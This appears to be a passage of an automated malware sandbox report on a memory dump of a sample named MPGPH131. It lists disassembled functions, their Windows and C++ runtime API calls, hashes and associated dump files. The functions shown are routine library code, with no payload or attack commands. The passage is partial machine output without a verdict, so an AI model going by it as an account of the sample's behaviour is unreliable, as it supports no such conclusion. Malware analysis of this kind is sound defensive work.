                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 79c7d47995b193324c58e5e75f8114ae7c659694a9d4b6726cc0bd538c67ef2b
                                  • Instruction ID: 582db58c97e3b72a6c2fc13f78f59d5fc296bd373acdf24ed7991e9530d96352
                                  • Opcode Fuzzy Hash: 79c7d47995b193324c58e5e75f8114ae7c659694a9d4b6726cc0bd538c67ef2b
                                  • Instruction Fuzzy Hash: DB218E72F00100AADB349F54C901BE777A7EF94B64B5A8564E90BDB311EB32DE81C390
                                  APIs
                                    • Part of subcall function 0066364B: GetLastError.KERNEL32(?,?,0065DD18,?,?,00000003,00652013,?,00651F82,?,00000016,00652191), ref: 0066364F
                                    • Part of subcall function 0066364B: SetLastError.KERNEL32(00000000,00000016,00652191,?,?,?,?,?,00000000,?,?,?,?,?,?,00572D8D), ref: 006636F1
                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0066E1A8
                                  • IsValidCodePage.KERNEL32(?), ref: 0066E1E6
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0066E1F9
                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0066E241
                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0066E25C
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 415426439-0
                                  • Opcode ID: 709ee7b6debb93d18019e9f73d863c524567b07cf52a2501fb9e25b9b7fdfc49
                                  • Instruction ID: fb3ce0a060b416d43efb0df03640acfce04c172d516f02590c8452a935629437
                                  • Opcode Fuzzy Hash: 709ee7b6debb93d18019e9f73d863c524567b07cf52a2501fb9e25b9b7fdfc49
                                  • Instruction Fuzzy Hash: D7518E75A00209ABEF10EFA5CC41AEAB3BEAF19700F144469E914EB291E7719A45CB61
                                  APIs
                                    • Part of subcall function 0066364B: GetLastError.KERNEL32(?,?,0065DD18,?,?,00000003,00652013,?,00651F82,?,00000016,00652191), ref: 0066364F
                                    • Part of subcall function 0066364B: SetLastError.KERNEL32(00000000,00000016,00652191,?,?,?,?,?,00000000,?,?,?,?,?,?,00572D8D), ref: 006636F1
                                  • GetACP.KERNEL32(?,?,?,?,?,?,00660A83,?,?,?,?,?,-00000050,?,?,?), ref: 0066D7EA
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00660A83,?,?,?,?,?,-00000050,?,?), ref: 0066D821
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0066D984
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 607553120-905460609
                                  • Opcode ID: d178783fe878e5421caec7947fa4b3d8c89c68801f08b1d6f517acc1e223d25d
                                  • Instruction ID: 553310b9b14041d713b3b1d060bd604b726ea019522e66b7e3f86c415581c3bd
                                  • Opcode Fuzzy Hash: d178783fe878e5421caec7947fa4b3d8c89c68801f08b1d6f517acc1e223d25d
                                  • Instruction Fuzzy Hash: F371E472F00206AADB24AB74CC46BAA77AEEF45700F14452DF905DB282EB70ED41C7A5
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005DAEB3
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005DAED5
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005DAEF5
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005DAF1F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005DAF8D
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005DAFD9
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 005DAFF3
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005DB088
                                  • std::_Facet_Register.LIBCPMT ref: 005DB095
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                  • String ID: bad locale name
                                  • API String ID: 3375549084-1405518554
                                  • Opcode ID: bef9261acfba66b5efe00cbb0f19e2dd582883317f0af8d298bcd07358f77110
                                  • Instruction ID: 95b217e7cb6ff3b8aa36c639a565b4aac22c5bcd11fd66564ef9f96481def414
                                  • Opcode Fuzzy Hash: bef9261acfba66b5efe00cbb0f19e2dd582883317f0af8d298bcd07358f77110
                                  • Instruction Fuzzy Hash: 4D618DB5D00205DFDB60DFA8D885BAEBFB6BF05310F18445AE804A7381E734E905CBA6
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005737E9
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00573835
                                  • __Getctype.LIBCPMT ref: 0057384E
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0057386A
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005738FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                  • String ID: 0:W$bad locale name
                                  • API String ID: 1840309910-2737869779
                                  • Opcode ID: 9381c707c66c564f7b22c0fcbf03d88a6683722809032e7b28b59172383cee8e
                                  • Instruction ID: 92871af02441c2d2dcb8bca30dac6d47413c49ab72061fc45fe1b9bb92acdaf6
                                  • Opcode Fuzzy Hash: 9381c707c66c564f7b22c0fcbf03d88a6683722809032e7b28b59172383cee8e
                                  • Instruction Fuzzy Hash: E15150F1D012589BDF50DFA4D88579EFBB8AF14314F148169EC08AB341E775EA08DBA2
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 006508B7
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 006508BF
                                  • _ValidateLocalCookies.LIBCMT ref: 00650948
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00650973
                                  • _ValidateLocalCookies.LIBCMT ref: 006509C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: Cd$csm
                                  • API String ID: 1170836740-2886570576
                                  • Opcode ID: fc7b2e5c92e692e5d36ecfa574e4b256b5d0de93c623f04b588b1cd24641c742
                                  • Instruction ID: 7b0b1f0043ee3c45a0ca33f4b0a8e3872e780dcc7e02a6078445eb5bb2915b21
                                  • Opcode Fuzzy Hash: fc7b2e5c92e692e5d36ecfa574e4b256b5d0de93c623f04b588b1cd24641c742
                                  • Instruction Fuzzy Hash: 6341C634A00209ABEF10DF68C880AEE7BB7BF45325F149559EC189B356D731EA49CB91
                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C086
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C0A3
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C0C4
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C147
                                  • __Xtime_diff_to_millis2.LIBCPMT ref: 0064C15F
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C18B
                                  • GetCurrentThreadId.KERNEL32 ref: 0064C1D1
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentThread$Xtime_diff_to_millis2
                                  • String ID:
                                  • API String ID: 1280559528-0
                                  • Opcode ID: 749ca56055c60945bda6b846443698de55d30dd82488773b17a6041d573482cd
                                  • Instruction ID: 0da9a2b0417093f916045043a3d97833515c8041a823d881dbaa521cc3f99ee0
                                  • Opcode Fuzzy Hash: 749ca56055c60945bda6b846443698de55d30dd82488773b17a6041d573482cd
                                  • Instruction Fuzzy Hash: AA515871901615CFCFA0DF24C8819A9B7B3BF48730B254459E80AAB352DB31ED81CBA4
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,00664C96,00572D8D,?,00000000,?,?,?,00664EC0,00000022,FlsSetValue,00680AD8,00680AE0,?), ref: 00664C48
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3664257935-537541572
                                  • Opcode ID: 35c8655a8166cb63a219cefae939d00e1fb114dcd510450ff51136c9be641ad1
                                  • Instruction ID: 758a5118883403a8ea0d240257c9e92e5990e10afc84155d3e66986894dce034
                                  • Opcode Fuzzy Hash: 35c8655a8166cb63a219cefae939d00e1fb114dcd510450ff51136c9be641ad1
                                  • Instruction Fuzzy Hash: 48210671A02225ABDB25EB65EC44B9B376BEB42774F251114E916A73D1DF30EF00CAD0
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C7BA
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C825
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C842
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C881
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C8E0
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C903
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiStringWide
                                  • String ID:
                                  • API String ID: 2829165498-0
                                  • Opcode ID: 8f0f12a281b30cb0afd653d75a48bc34250a669173de77d46a0661e8bde9ce20
                                  • Instruction ID: 2d7c3b42b0261af375db9a79780b1dbe691f12a95fa84a2751ac9bb1b5ce83d9
                                  • Opcode Fuzzy Hash: 8f0f12a281b30cb0afd653d75a48bc34250a669173de77d46a0661e8bde9ce20
                                  • Instruction Fuzzy Hash: 8851B07290220ABFEF609FA4CC45FEB7BABEF44760F154529F914A6351DB318D508B90
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005D9543
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 005D9566
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005D9586
                                  • std::_Facet_Register.LIBCPMT ref: 005D95FB
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 005D9613
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 005D962B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 65c787b476747ab718782a2dd89a61d57f4a9bc7d45822146567b1edc279a298
                                  • Instruction ID: 640745403de66d693c2ed94f2d3ffdacf81087b1976a3c234d89e6f1447ee982
                                  • Opcode Fuzzy Hash: 65c787b476747ab718782a2dd89a61d57f4a9bc7d45822146567b1edc279a298
                                  • Instruction Fuzzy Hash: AC41DF71D002199FCB25EF58E840AAABBB5FF42320F14466AE9196B391D730EE05CBD1
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FADDE7BB,?,?,00000000,0067ACB1,000000FF,?,0065CBBF,?,?,0065CB93,00000016), ref: 0065CC18
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0065CC2A
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,0067ACB1,000000FF,?,0065CBBF,?,?,0065CB93,00000016), ref: 0065CC4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 3efd8c89a7c24518b42e7d73edfa174541974a6bc97351ee868d3e397a29dbf1
                                  • Instruction ID: cb542aab21bf1b005bd036e32ac635eeccd9c91589c15a5efa77df23def8888d
                                  • Opcode Fuzzy Hash: 3efd8c89a7c24518b42e7d73edfa174541974a6bc97351ee868d3e397a29dbf1
                                  • Instruction Fuzzy Hash: A501A231940619EFCB159B54DC05FEEBBFAFB44B32F008629F819A2290DB759A44CA90
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 0057A478
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0057A483
                                  • GetProcessHeap.KERNEL32(?,?), ref: 0057A490
                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00010000), ref: 0057A4A6
                                  • RtlAllocateHeap.NTDLL(?,00000000,00010000), ref: 0057A4DC
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
